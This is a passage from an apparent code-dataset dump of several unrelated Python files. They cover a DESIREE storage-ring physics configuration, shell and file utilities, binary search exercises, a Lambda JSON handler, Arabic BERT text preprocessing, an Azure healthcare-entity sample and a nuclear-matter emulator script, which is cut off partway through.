+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n# author: MingChao Ji\n# email: mingchao.ji@fysik.su.se\n# date created: 2020-01-15 13:25:52\n# last modified: 2020-03-06 13:39:07\n# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n\nfrom scipy.special import radian\n\nimport const\nimport func\nimport numpy as np\n# import pandas as pd\nimport periodictable as pt\n\n\n# for the reaction H+ + H- --> H + H, unit: eV, ker[2], n = 3 reaction, dominant at low cm energy\nker = [0.94, 0.57]\nbr_ratio = [0.5, 0.5] # branching ratio, 0.48 stands for 48 %\nn_ker = int(len(ker))\n\n# num of bins for hist, bin width for density\nnum_bins, bin_width = 500, 0.01\n\n# voltage range around zero center of mass energy\ndt_volt_slt = [0, 500]\n\n# ------------------------------------------Ion source settings----------------------------------------------\n# low energy platform (le)\nle_extra_volt = -13.60e3 # unit: V\nanion_mass = (pt.H[1].mass + pt.C[13].mass * 4)* const.amu_kg + const.electron_kg\nanion_charge = -1 # unit: e\nanion_ke = le_extra_volt * anion_charge # unit: eV\n# fwhm of the gaussian-like KE distribution = anion_ke * anion_ke_spread\nanion_ke_spread = 0.002\nanion_ke_sig = anion_ke * anion_ke_spread / 2.3548\n\n# high energy platform (he)\nhe_extra_volt = 4.5e3 # unit: V\ncation_mass = pt.O[16].mass * const.amu_kg - const.electron_kg # unit: kg\n# print(pt.H[1].mass, pt.He[4].mass)\ncation_charge = 1 # unit: e\ncation_ke = he_extra_volt * cation_charge\n# fwhm of the gaussian-like KE distribution = cation_ke * cation_ke_spread\ncation_ke_spread = 0.002\ncation_ke_sig = cation_ke * cation_ke_spread / 2.3548\n\n# calc the reduced mass\nreduced_mass = anion_mass * cation_mass / (anion_mass + cation_mass)\n# -----------------------------------------------------------------------------------------------------------\n\n\n# -----------------------------------------Desiree Rings settings--------------------------------------------\n# geometry of desiree setup\ncirc_ring_s, circ_ring_a = 8.68, 8.71 # unit: m, hereafter the same\nle_to_lebc, he_to_hebc = 3.25, 6.71\nlebc_to_s, lebc_to_a = 7.24, 9.39\nhebc_to_s, hebc_to_a = 9.93, 7.80\n\n# settings on drift tube\n# give the first and last tube numbers (from 1 to 7), if only one used, write one number\ndrift_tube_bias = [3, 5]\n\nms_ctr_to_imd = 1.690 # center, unit: m\n# distance from imd to: 10def center, dt1-7 start, dt7 end, 10 def center, interval shared by two neighbouring tubes\ndts_to_imd = [1.166, 1.410, 1.4875, 1.5665, 1.6505, 1.7295, 1.8135, 1.8925, 1.970, 2.214]\n# diff = [dist_to_imd[i+1] - dist_to_imd[i] for i in range(len(dist_to_imd)-1)]\ndt_first, dt_last = min(drift_tube_bias), max(drift_tube_bias)\ndt_ctr_to_imd = (dts_to_imd[dt_first] + dts_to_imd[dt_last + 1]) * 0.5\n\n# beam merge condition, assumed to be the best, 0.1 degree\nbeam_merge_deg = 0.0\nbeam_merge_rad = radian(beam_merge_deg, 0, 0)\n\n# to calc the minimum center of mass energy\ndrift_tube_volt = np.linspace(-2000, 2000, 4001) # unit: v\n\nanion_ke_tube = anion_ke - drift_tube_volt * anion_charge\ncation_ke_tube = cation_ke - drift_tube_volt * cation_charge\n\n# eV_J convert can be omitted on both sides\ncom_energy = reduced_mass * (anion_ke_tube / anion_mass + cation_ke_tube / cation_mass - 2 * np.sqrt(\n anion_ke_tube * cation_ke_tube / (anion_mass * cation_mass)) * np.cos(beam_merge_rad))\n# print(drift_tube_volt, com_energy)\n\n# find the min value of ecm_energy and the corresponding drift_tube_volt.\necm_min = np.min(com_energy)\necm_min_idx = com_energy.tolist().index(ecm_min)\n\n# to calc the signal at ~ 0 eV center of mass energy\ndt_cent_volt = drift_tube_volt[ecm_min_idx] # unit: V\n# -----------------------------------------------------------------------------------------------------------\n\n\n# ---------------------------------Detector & Data Acquisition Settings--------------------------------------\n# Imaging Detector\nimg_pixel = 352 # pix, calibrated from exp img\nimg_size = 75.0 # mm\nimg_resolution = img_size / img_pixel # mm/pix\n# print(img_resolution)\n\ntick_freq = 2083333\n\n# imd spot size, intensity discrimination\n# ref value to start: spot_size_diss = [0, 2000], spot_intensity_diss = [0, 1e5]\nspot_size_diss = [0, 8000]\nspot_intensity_diss = [0, 50000]\n\nmax_img_spots, img_count_diss = 6, 1 # max num of spots, plot discrimination\n\n# calibrated from 1 camac_time 1 spot event\n# ref to the y values of spots\nimd_strip_center = [353, 331.37, 309.65, 287.94, 266.71, 245.11, 221.44, 201.82, 179.73, 158.07, 137.43,\n 115.93, 93.26, 72.22, 50.33, 30.03]\n# print(imd_strip_center[::-1])\nimd_strip_hw = 20\n\n# data acquisition system\n# convert voltage to time, time = 500ns/10V + 95 ns\ntac_convert = [50, 180]\n\n# camac basic settings\ncamac_strips = 16\ncamac_time_diss = 20 # unit: ns\n\n# used in the camac time calibration\n# same discrimination as camac_time_diss, but without unit.\ncamac_value_diss = 180\n\n# input time = 16 * n + 25 unit: ns, might not be true, use the measured one for calibration\ncamac_convert = [16, 25]\n# camac time measured in exp during the calibration\ncamac_time = [18.96, 40.66, 61.17, 80.39, 98.04, 116.92, 135.43, 147.79, 157.17, 167.69, 177.80, 188.00, 197.00,\n 207.41, 217.23, 227.08]\n\n# match ratio diss when combining camaco and img files\nmatch_ratio_diss = 0.6\n\n# create a list of offset to correct the frame id\nmax_id_offset = 5\n# create a list of offset numbers for img\nid_offset = [[0] if i == 0 else [-i, i] for i in range(max_id_offset + 1)]\nframe_id_offset = sum(id_offset, [])\n# print(frame_id_offset)\n\nmax_cycle_offset = 20\n# create a list of offset numbers for storage cycle num\ncycle_num_offset = [j for j in range(max_cycle_offset + 1)]\n# print(cycle_num_offset)\n# -----------------------------------------------------------------------------------------------------------\n\n\n# ---------------------------------------Simple Calcs & Print2Screen-----------------------------------------\nprint2scr = False\n\n# simple calcs\nanion_speed = func.ke2speed(anion_ke, anion_mass) # unit: m/s\ncation_speed = func.ke2speed(cation_ke, cation_mass) # unit: m/s\n\ntof_le_to_s = (le_to_lebc + lebc_to_s) * 1.0e6 / anion_speed # us\ntof_le_to_a = (le_to_lebc + lebc_to_a) * 1.0e6 / anion_speed # us\ntof_he_to_s = (he_to_hebc + hebc_to_s) * 1.0e6 / cation_speed # us\ntof_he_to_a = (he_to_hebc + hebc_to_a) * 1.0e6 / cation_speed # us\n\nrev_time_s = circ_ring_s * 1e6 / cation_speed # unit: microsec\nrev_time_a = circ_ring_a * 1e6 / anion_speed # unit: microsec\n\nneutral_speed = anion_speed\nimd_gate_delay = ms_ctr_to_imd * 1.0e6 / neutral_speed # unit: us\n\nif print2scr is True:\n print('le ion speed (m/s): {0}'\n '\\nhe ion speed (m/s): {1}\\n'\n '\\ntof le to s-ring (us): {2}'\n '\\ntof he to a-ring (us): {3}\\n'\n '\\ns-ring revolution period (us): {4}'\n '\\na-ring revolution period (us): {5}\\n'\n '\\nid signal delay (us): {6}'\n '\\n'.format(str(anion_speed), str(cation_speed), str(tof_le_to_s), str(tof_he_to_a), str(rev_time_s), str(rev_time_a), str(imd_gate_delay)))\n#------------------------------------------------------------------------------------------------------------\n","sub_path":"desiree.py","file_name":"desiree.py","file_ext":"py","file_size_in_byte":7198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"528170711","text":"#\n# Copyright (c) 2013, Prometheus Research, LLC\n#\n\n\nfrom .core import env, debug, fail\nimport sys\nimport os\nimport shutil\nimport shlex\nimport subprocess\n\n\ndef cp(src_path, dst_path):\n \"\"\"Copy a file or a directory.\"\"\"\n debug(\"cp {} {}\", src_path, dst_path)\n if os.path.isfile(src_path):\n shutil.copy2(src_path, dst_path)\n elif os.path.islink(src_path):\n link = os.readlink(src_path)\n os.symlink(link, dst_path)\n else:\n if os.path.exists(dst_path):\n dst_path = os.path.join(dst_path, os.path.basename(src_path))\n os.mkdir(dst_path)\n for filename in os.listdir(src_path):\n with env(debug=False):\n cp(os.path.join(src_path, filename),\n os.path.join(dst_path, filename))\n\n\ndef mv(src_path, dst_path):\n \"\"\"Rename a file.\"\"\"\n debug(\"mv {} {}\", src_path, dst_path)\n os.rename(src_path, dst_path)\n\n\ndef rm(path):\n \"\"\"Remove a file.\"\"\"\n debug(\"rm {}\", path)\n os.unlink(path)\n\n\ndef rmtree(path):\n \"\"\"Remove a directory tree.\"\"\"\n debug(\"rmtree {}\", path)\n shutil.rmtree(path)\n\n\ndef mktree(path):\n \"\"\"Create a directory tree.\"\"\"\n if not os.path.isdir(path):\n debug(\"mktree {}\", path)\n os.makedirs(path)\n\n\ndef exe(cmd, cd=None, environ=None):\n \"\"\"Execute the command replacing the current process.\"\"\"\n debug(\"{}\", cmd)\n if isinstance(cmd, str):\n cmd = shlex.split(cmd)\n if environ:\n overrides = environ\n environ = os.environ.copy()\n environ.update(overrides)\n if cd:\n os.chdir(cd)\n if hasattr(sys, 'exitfunc'):\n sys.exitfunc()\n try:\n if environ:\n os.execvpe(cmd[0], cmd, environ)\n else:\n os.execvp(cmd[0], cmd)\n except OSError as exc:\n raise fail(str(exc))\n\n\ndef sh(cmd, data=None, cd=None, environ=None):\n \"\"\"Execute a command using shell.\"\"\"\n if cd is None:\n debug(\"{}\", cmd)\n else:\n debug(\"cd {}; {}\", cd, cmd)\n stream = subprocess.PIPE\n if env.debug:\n stream = None\n if environ:\n overrides = environ\n environ = os.environ.copy()\n environ.update(overrides)\n proc = subprocess.Popen(cmd, shell=True, stdin=stream,\n stdout=stream, stderr=stream,\n cwd=cd, env=environ)\n proc.communicate(data)\n if proc.returncode != 0:\n raise fail(\"`{}`: non-zero exit code\", cmd)\n\n\ndef pipe(cmd, data=None, cd=None, environ=None):\n \"\"\"Execute the command, return the output.\"\"\"\n if cd is None:\n debug(\"| {}\", cmd)\n else:\n debug(\"$ cd {}; | {}\", cd, cmd)\n stream = subprocess.PIPE\n if environ:\n overrides = environ\n environ = os.environ.copy()\n environ.update(overrides)\n proc = subprocess.Popen(cmd, shell=True,\n stdout=stream, stderr=stream,\n cwd=cd, env=environ)\n out, err = proc.communicate(data)\n if proc.returncode != 0:\n if env.debug:\n if out:\n sys.stdout.write(out)\n if err:\n sys.stderr.write(err)\n raise fail(\"`{}`: non-zero exit code\", cmd)\n return out\n\n","sub_path":"src/rex.ctl/src/rex/ctl/fs.py","file_name":"fs.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"470424930","text":"# TO-DO: Implement a recursive implementation of binary search\nimport math\ndef binary_search(arr, target, start, end):\n # Your code here\n if len(arr) == 0:\n return -1\n mid = math.floor((start + end)/2)\n if arr[mid] == target:\n return mid\n elif start >= end:\n return -1\n else:\n if target > arr[mid]:\n return binary_search(arr, target, mid + 1, end)\n else:\n return binary_search(arr, target, start, mid - 1)\n\n# STRETCH: implement an order-agnostic binary search\n# This version of binary search should correctly find \n# the target regardless of whether the input array is\n# sorted in ascending order or in descending order\n# You can implement this function either recursively \n# or iteratively\ndef agnostic_binary_search(arr, target, start=0, end=None):\n # Your code here\n if len(arr) == 0:\n return -1\n if end == None:\n end = len(arr) - 1\n # dir = -1 if array is descending, 1 if ascending\n dir = -1 if arr[0] > arr[-1] else 1\n mid = math.floor((start + end)/2)\n if arr[mid] == target:\n return mid\n elif start >= end:\n return -1\n else:\n if dir * target > dir * arr[mid]:\n return agnostic_binary_search(arr, target, mid + 1, end)\n else:\n return agnostic_binary_search(arr, target, start, mid - 1)","sub_path":"src/searching/searching.py","file_name":"searching.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"314224245","text":"from __future__ import print_function\n\nimport json\nimport logging\nimport sys\nimport os\nthis_dir = os.path.dirname(os.path.realpath(__file__))\nsys.path.append(\"{0}/../lib\".format(this_dir))\nsys.path.append(\"{0}/../src\".format(this_dir))\nfrom jsonschema import validate\nfrom generator.generator import convert_to_imacro\n\nlog = logging.getLogger()\nlog.setLevel(logging.DEBUG)\n\n\ndef handler(event, context):\n # input_json = json.dumps(event)\n with open(os.path.join(this_dir, '../resources/schema.json'), 'r') as myfile:\n schema = json.loads(myfile.read())\n try:\n validate(event, schema)\n except Exception as e:\n return \"The input failed validation\\n{0}\".format(repr(e))\n try:\n output = convert_to_imacro(event)\n except Exception as e:\n return \"An internal error occured during response generation\\n{0}\".format(repr(e))\n return output\n","sub_path":"serverless-autotravel-python/functions/generate/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"490256500","text":"#%%\r\nimport re\r\nimport pyarabic.araby as araby\r\n#%%\r\nfrom py4j.java_gateway import JavaGateway\r\n\r\ngateway = JavaGateway.launch_gateway(classpath='./bert/FarasaSegmenterJar.jar')\r\nfarasa = gateway.jvm.com.qcri.farasa.segmenter.Farasa()\r\n#%%\r\n\r\nprefix_list = [\"ال\", \"و\", \"ف\", \"ب\", \"ك\", \"ل\", \"لل\", \"\\u0627\\u0644\", \"\\u0648\", \"\\u0641\", \"\\u0628\", \"\\u0643\", \"\\u0644\", \"\\u0644\\u0644\", \"س\"]\r\nsuffix_list = [\"ه\", \"ها\", \"ك\", \"ي\", \"هما\", \"كما\", \"نا\", \"كم\", \"هم\", \"هن\", \"كن\",\r\n \"ا\", \"ان\", \"ين\", \"ون\", \"وا\", \"ات\", \"ت\", \"ن\", \"ة\"\r\n \"\\u0647\", \"\\u0647\\u0627\", \"\\u0643\", \"\\u064a\", \"\\u0647\\u0645\\u0627\", \"\\u0643\\u0645\\u0627\", \"\\u0646\\u0627\", \"\\u0643\\u0645\", \"\\u0647\\u0645\", \"\\u0647\\u0646\", \"\\u0643\\u0646\",\r\n \"\\u0627\", \"\\u0627\\u0646\", \"\\u064a\\u0646\", \"\\u0648\\u0646\", \"\\u0648\\u0627\", \"\\u0627\\u062a\", \"\\u062a\", \"\\u0646\", \"\\u0629\" ]\r\n\r\n\r\nregex_url = r'(http(s)?:\\/\\/.)?(www\\.)?[-a-zA-Z0-9@:%._\\+~#=]{2,256}\\.[a-z]{2,6}\\b([-a-zA-Z0-9@:%_\\+.~#?&//=]*)'\r\nregex_mention = r'@[\\w\\d]+'\r\nregex_email = r'\\S+@\\S+'\r\nredundant_punct_pattern = r'([!\\\"#\\$%\\'\\(\\)\\*\\+,\\.:;\\-<=·>?@\\[\\\\\\]\\^_ـ`{\\|}~—٪’،؟`୍“؛”ۚ【»؛\\s+«–…‘]{2,})'\r\n#%%\r\n\r\ndef remove_elongation(word):\r\n\t\"\"\"\r\n :param word: the input word to remove elongation\r\n :return: delongated word\r\n \"\"\"\r\n\tregex_tatweel = r'(\\w)\\1{2,}'\r\n\t# loop over the number of times the regex matched the word\r\n\tfor index_ in range(len(re.findall(regex_tatweel, word))):\r\n\t\tif re.search(regex_tatweel, word):\r\n\t\t\telongation_found = re.search(regex_tatweel, word)\r\n\t\t\telongation_replacement = elongation_found.group()[0]\r\n\t\t\telongation_pattern = elongation_found.group()\r\n\t\t\tword = re.sub(elongation_pattern, elongation_replacement, word, flags=re.MULTILINE)\r\n\t\telse:\r\n\t\t\tbreak\r\n\treturn word\r\n\r\n#%%\r\n\r\ndef tokenize_arabic_words_farasa(line_input):\r\n segmented_line=[]\r\n line_farasa = farasa.segmentLine(line_input)\r\n for index , word in enumerate(line_farasa):\r\n if word in ['[',']']:\r\n continue\r\n if word in ['رابط','بريد','مستخدم'] and line_farasa[index-1] in ['[',']']:\r\n segmented_line.append('['+word+']')\r\n continue\r\n segmented_word=[]\r\n for token in word.split('+'):\r\n if token in prefix_list:\r\n segmented_word.append(token+'+')\r\n elif token in suffix_list:\r\n segmented_word.append('+'+token)\r\n else:\r\n segmented_word.append(token)\r\n segmented_line.extend(segmented_word)\r\n\r\n return ' '.join(segmented_line)\r\n\r\n\r\ndef remove_redundant_punct(text):\r\n\ttext_ = text\r\n\tresult = re.search(redundant_punct_pattern, text)\r\n\tdif = 0\r\n\twhile result:\r\n\t\tsub = result.group()\r\n\t\tsub = sorted(set(sub), key=sub.index)\r\n\t\tsub = ' ' + ''.join(list(sub)) + ' '\r\n\t\ttext = ''.join((text[:result.span()[0]+dif], sub, text[result.span()[1]+dif:]))\r\n\t\ttext_ = ''.join((text_[:result.span()[0]], text_[result.span()[1]:])).strip()\r\n\t\tdif = abs(len(text) - len(text_))\r\n\t\tresult = re.search(redundant_punct_pattern, text_)\r\n\ttext = re.sub(r'\\s+', ' ', text)\r\n\treturn text.strip()\r\n\r\n#%%\r\n\r\ndef preprocess(text, do_farasa_tokenization=True):\r\n\ttext=str(text)\r\n\tprocessing_tweet = araby.strip_tashkeel(text)\r\n\tprocessing_tweet = re.sub(r'\\d+\\/[ء-ي]+\\/\\d+\\]', '', processing_tweet)\r\n\t#processing_tweet = re.sub(r'\\d+([,\\d]+)?', '[رقم]', processing_tweet)\r\n\tprocessing_tweet = re.sub('ـ', '', processing_tweet)\r\n\tprocessing_tweet = re.sub(regex_url, '[رابط]', processing_tweet)\r\n\tprocessing_tweet = re.sub(regex_email, '[بريد]', processing_tweet)\r\n\tprocessing_tweet = re.sub(regex_mention, '[مستخدم]', processing_tweet)\r\n\tprocessing_tweet = re.sub('…', r'\\.', processing_tweet).strip()\r\n\tprocessing_tweet = remove_redundant_punct(processing_tweet)\r\n\r\n\t#processing_tweet = re.sub(r'\\[ رقم \\]|\\[رقم \\]|\\[ رقم\\]', ' [رقم] ', processing_tweet)\r\n\tprocessing_tweet = re.sub(r'\\[ رابط \\]|\\[ رابط\\]|\\[رابط \\]', ' [رابط] ', processing_tweet)\r\n\tprocessing_tweet = re.sub(r'\\[ بريد \\]|\\[ بريد\\]|\\[بريد \\]', ' [بريد] ', processing_tweet)\r\n\tprocessing_tweet = re.sub(r'\\[ مستخدم \\]|\\[ مستخدم\\]|\\[مستخدم \\]', ' [مستخدم] ', processing_tweet)\r\n\r\n\tprocessing_tweet = remove_elongation(processing_tweet)\r\n\tif do_farasa_tokenization:\r\n\t processing_tweet = tokenize_arabic_words_farasa(processing_tweet)\r\n\treturn processing_tweet.strip()\r\n","sub_path":"preprocess_arabert.py","file_name":"preprocess_arabert.py","file_ext":"py","file_size_in_byte":4487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"339503622","text":"# -------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n# --------------------------------------------------------------------------\n\n\"\"\"\nFILE: sample_analyze_healthcare_entities.py\n\nDESCRIPTION:\n This sample demonstrates how to detect healthcare entities in a batch of documents.\n\n In this sample we will be a newly-hired engineer working in a pharmacy. We are going to\n comb through all of the prescriptions our pharmacy has fulfilled so we can catalog how\n much inventory we have.\n\nUSAGE:\n python sample_analyze_healthcare_entities.py\n\n Set the environment variables with your own values before running the sample:\n 1) AZURE_LANGUAGE_ENDPOINT - the endpoint to your Language resource.\n 2) AZURE_LANGUAGE_KEY - your Language subscription key\n\"\"\"\n\n\ndef sample_analyze_healthcare_entities() -> None:\n\n print(\n \"In this sample we will be combing through the prescriptions our pharmacy has fulfilled \"\n \"so we can catalog how much inventory we have\"\n )\n print(\n \"We start out with a list of prescription documents.\"\n )\n\n # [START analyze_healthcare_entities]\n import os\n import typing\n from azure.core.credentials import AzureKeyCredential\n from azure.ai.textanalytics import TextAnalyticsClient, HealthcareEntityRelation\n\n endpoint = os.environ[\"AZURE_LANGUAGE_ENDPOINT\"]\n key = os.environ[\"AZURE_LANGUAGE_KEY\"]\n\n text_analytics_client = TextAnalyticsClient(\n endpoint=endpoint,\n credential=AzureKeyCredential(key),\n )\n\n documents = [\n \"\"\"\n Patient needs to take 100 mg of ibuprofen, and 3 mg of potassium. Also needs to take\n 10 mg of Zocor.\n \"\"\",\n \"\"\"\n Patient needs to take 50 mg of ibuprofen, and 2 mg of Coumadin.\n \"\"\"\n ]\n\n poller = text_analytics_client.begin_analyze_healthcare_entities(documents)\n result = poller.result()\n\n docs = [doc for doc in result if not doc.is_error]\n\n print(\"Let's first visualize the outputted healthcare result:\")\n for doc in docs:\n for entity in doc.entities:\n print(f\"Entity: {entity.text}\")\n print(f\"...Normalized Text: {entity.normalized_text}\")\n print(f\"...Category: {entity.category}\")\n print(f\"...Subcategory: {entity.subcategory}\")\n print(f\"...Offset: {entity.offset}\")\n print(f\"...Confidence score: {entity.confidence_score}\")\n if entity.data_sources is not None:\n print(\"...Data Sources:\")\n for data_source in entity.data_sources:\n print(f\"......Entity ID: {data_source.entity_id}\")\n print(f\"......Name: {data_source.name}\")\n if entity.assertion is not None:\n print(\"...Assertion:\")\n print(f\"......Conditionality: {entity.assertion.conditionality}\")\n print(f\"......Certainty: {entity.assertion.certainty}\")\n print(f\"......Association: {entity.assertion.association}\")\n for relation in doc.entity_relations:\n print(f\"Relation of type: {relation.relation_type} has the following roles\")\n for role in relation.roles:\n print(f\"...Role '{role.name}' with entity '{role.entity.text}'\")\n print(\"------------------------------------------\")\n\n print(\"Now, let's get all of medication dosage relations from the documents\")\n dosage_of_medication_relations = [\n entity_relation\n for doc in docs\n for entity_relation in doc.entity_relations if entity_relation.relation_type == HealthcareEntityRelation.DOSAGE_OF_MEDICATION\n ]\n # [END analyze_healthcare_entities]\n\n print(\n \"Now, I will create a dictionary of medication to total dosage. \"\n \"I will use a regex to extract the dosage amount. For simplicity sake, I will assume \"\n \"all dosages are represented with numbers and have mg unit.\"\n )\n import re\n from collections import defaultdict\n\n medication_to_dosage: typing.Dict[str, int] = defaultdict(int)\n\n for relation in dosage_of_medication_relations:\n # The DosageOfMedication relation should only contain the dosage and medication roles\n\n dosage_role = next(iter(filter(lambda x: x.name == \"Dosage\", relation.roles)))\n medication_role = next(iter(filter(lambda x: x.name == \"Medication\", relation.roles)))\n\n try:\n dosage_value = int(re.findall(r\"\\d+\", dosage_role.entity.text)[0]) # we find the numbers in the dosage\n medication_to_dosage[medication_role.entity.text] += dosage_value\n except StopIteration:\n # Error handling for if there's no dosage in numbers.\n pass\n\n for medication, dosage in medication_to_dosage.items():\n print(\"We have fulfilled '{}' total mg of '{}'\".format(\n dosage, medication\n ))\n\n\nif __name__ == \"__main__\":\n sample_analyze_healthcare_entities()\n","sub_path":"sdk/textanalytics/azure-ai-textanalytics/samples/sample_analyze_healthcare_entities.py","file_name":"sample_analyze_healthcare_entities.py","file_ext":"py","file_size_in_byte":5112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"45228725","text":"import os\nimport numpy as np\nimport math\nimport re\nimport scipy.linalg as spla\nfrom scipy import interpolate\n\n\n######################################################\n######################################################\n### generate random LECs set\n######################################################\n######################################################\ndef generate_random_LEC(LEC,LEC_range):\n LEC_max = LEC * ( 1 + LEC_range)\n LEC_min = LEC * ( 1 - LEC_range)\n LEC_random = np.zeros(LEC_num)\n for loop1 in range (LEC_num):\n LEC_random[loop1] = LEC_min[loop1] + np.random.rand(1) * (LEC_max[loop1] - LEC_min[loop1])\n return LEC_random\n\n\n######################################################\n######################################################\n### read LECs set from file\n######################################################\n######################################################\ndef read_LEC(file_path):\n LEC = np.zeros(LEC_num)\n with open(file_path,'r') as f_1:\n count = len(open(file_path,'rU').readlines())\n data = f_1.readlines()\n wtf = re.match('#', 'abc',flags=0)\n for loop1 in range(0,count):\n if ( re.search('cE and cD', data[loop1],flags=0) != wtf):\n temp_1 = re.findall(r\"[-+]?\\d+\\.?\\d*\",data[loop1+1])\n LEC[0] = float(temp_1[0])\n LEC[1] = float(temp_1[1])\n if ( re.search('LEC ci', data[loop1],flags=0) != wtf):\n temp_1 = re.findall(r\"[-+]?\\d+\\.?\\d*\",data[loop1+1])\n LEC[2] = float(temp_1[0])\n LEC[3] = float(temp_1[1])\n LEC[4] = float(temp_1[2])\n LEC[5] = float(temp_1[3])\n if ( re.search('c1s0 & c3s1', data[loop1],flags=0) != wtf):\n temp_1 = re.findall(r\"[-+]?\\d+\\.?\\d*\",data[loop1+1])\n LEC[6] = float(temp_1[0])\n LEC[7] = float(temp_1[1])\n LEC[8] = float(temp_1[2])\n LEC[9] = float(temp_1[3])\n if ( re.search('cnlo', data[loop1],flags=0) != wtf):\n temp_1 = re.findall(r\"[-+]?\\d+\\.?\\d*\",data[loop1+1])\n LEC[10] = float(temp_1[0])\n LEC[11] = float(temp_1[1])\n LEC[12] = float(temp_1[2])\n LEC[13] = float(temp_1[3])\n LEC[14] = float(temp_1[4])\n LEC[15] = float(temp_1[5])\n LEC[16] = float(temp_1[6])\n return LEC\n\n######################################################\n######################################################\n### generate nuclear matter infile\n######################################################\n######################################################\ndef output_ccm_in_file(file_path,vec_input,particle_num,matter_type,density,nmax,option):\n with open(file_path,'w') as f_1:\n f_1.write('!Chiral order for Deltas(LO = 0,NLO=2,NNLO=3,N3LO=4) and cutoff'+'\\n')\n f_1.write('3, 450\\n')\n f_1.write('! cE and cD 3nf parameters:'+'\\n' )\n f_1.write('%.12f, %.12f\\n' % (vec_input[0],vec_input[1]))\n f_1.write('! LEC ci \\n')\n f_1.write('%.12f, %.12f, %.12f, %.12f \\n' % (vec_input[2],vec_input[3],vec_input[4],vec_input[5]))\n f_1.write('!c1s0 & c3s1 \\n')\n f_1.write('%.12f, %.12f, %.12f, %.12f, %.12f, %.12f \\n' % (vec_input[6],vec_input[7],vec_input[8],vec_input[9],vec_input[9],vec_input[9]))\n f_1.write('! cnlo(7) \\n')\n f_1.write('%.12f, %.12f, %.12f, %.12f, %.12f, %.12f, %.12f \\n' % (vec_input[10],vec_input[11],vec_input[12],vec_input[13],vec_input[14],vec_input[15],vec_input[16]))\n f_1.write('! number of particles'+'\\n')\n f_1.write('%d\\n' % (particle_num) )\n f_1.write('! specify: pnm/snm, input type: density/kfermi'+'\\n')\n f_1.write(matter_type+', density'+'\\n')\n f_1.write('! specify boundary conditions (PBC/TABC/TABCsp/subspace_cal/subspace_cal_dens/solve_general_EV)'+'\\n')\n f_1.write('%-20s \\n' % (option))\n f_1.write('! dens/kf, ntwist, nmax'+'\\n')\n f_1.write('%.12f, 1, %d\\n' % (density, nmax))\n f_1.write('! specify cluster approximation: CCD, CCDT'+'\\n')\n f_1.write('CCD(T)'+'\\n')\n f_1.write('! tnf switch (T/F) and specify 3nf approximation: 0=tnf0b, 1=tnf1b, 2=tnf2b'+'\\n')\n f_1.write('T, 3'+'\\n')\n f_1.write('! 3nf cutoff(MeV),non-local reg. exp'+'\\n')\n f_1.write('450, 3'+'\\n')\n\n\n\n######################################################\n######################################################\n### read ccm_nuclear_matter output\n######################################################\n######################################################\ndef read_nucl_matt_out(file_path): # converge: flag = 1 converge: flag =0\n with open(file_path,'r') as f_1:\n converge_flag = int (1)\n count = len(open(file_path,'rU').readlines())\n #if ( count > 1500 ):\n # converge_flag =int (0)\n data = f_1.readlines()\n wtf = re.match('#', 'abc',flags=0)\n ccd = 0\n for loop1 in range(0,count):\n if ( re.search('CCD energy', data[loop1],flags=0) != wtf):\n temp_1 = re.findall(r\"[-+]?\\d+\\.?\\d*\",data[loop1])\n ccd = float(temp_1[0])\n return ccd #,converge_flag\n #print ('No \"E/A\" found in the file:'+file_path)\n #return float('nan')\n\n\n\n######################################################\n######################################################\n### call CCM_nuclear_matter\n######################################################\n######################################################\ndef nuclear_matter(vec_input,dens):\n neutron_num = 14\n particle_num = 28\n density = dens\n density_min = 0.14\n density_max = 0.22\n nmax = 2\n #snm_dens = np.zeros(5)\n #snm_energy_per_nucleon = np.zeros(5)\n #snm_dens_new = np.zeros(interpolation_count)\n #snm_energy_per_nucleon_new = np.zeros(interpolation_count)\n\n nucl_matt_in_dir = './ccm_in_pnm_%.2f' % (density)\n nucl_matt_out_dir = './pnm_rho_%.2f.out' % (density)\n option = 'PBC'\n output_ccm_in_file(nucl_matt_in_dir,vec_input,neutron_num,'pnm',density,nmax,option)\n os.system('./'+nucl_matt_exe+' '+nucl_matt_in_dir+' > '+nucl_matt_out_dir) \n ccd = read_nucl_matt_out(nucl_matt_out_dir)\n print (\"ccd energy from real CC calculation: \"+str(ccd))\n return ccd\n\n\n######################################################\n######################################################\n### Emulator!!!\n######################################################\n######################################################\ndef emulator(LEC_target,dens):\n neutron_num = 14\n particle_num = 28\n density = dens\n density_min = 0.14\n density_max = 0.22\n nmax = 2\n nucl_matt_in_dir = './ccm_in_pnm_%.2f' % (dens)\n nucl_matt_out_dir = './pnm_rho_%.2f.out' % (dens)\n option = 'solve_general_EV' \n output_ccm_in_file(nucl_matt_in_dir,LEC_target,neutron_num,'pnm',density,nmax,option)\n os.system('./'+nucl_matt_exe+' '+nucl_matt_in_dir+' > '+nucl_matt_out_dir) \n \n H = np.zeros((subspace_dimension,subspace_dimension))\n N = np.zeros((subspace_dimension,subspace_dimension))\n K = np.zeros((subspace_dimension,subspace_dimension))\n\n in_dir = \"./H_matrix.txt\"\n H = np.loadtxt(in_dir)\n in_dir = \"./N_matrix.txt\"\n N = np.loadtxt(in_dir)\n in_dir = \"./K_matrix.txt\"\n K = np.loadtxt(in_dir)\n H = H + K \n # print(\"H=\"+str(H))\n # print(\"rank of N =\"+str(np.linalg.matrix_rank(N)))\n \n# eigvals,eigvec_L, eigvec_0 = spla.eig(H,N,left =True,right=True)\n eigvals = H\n# loop2 = 0\n# for loop1 in range(subspace_dimension):\n# ev = eigvals[loop1]\n# if ev.imag > 0.01:\n# continue\n# # if ev.real < 0:\n# # continue\n# loop2 = loop2+1\n#\n# ev_all = np.zeros(loop2)\n# loop2 = 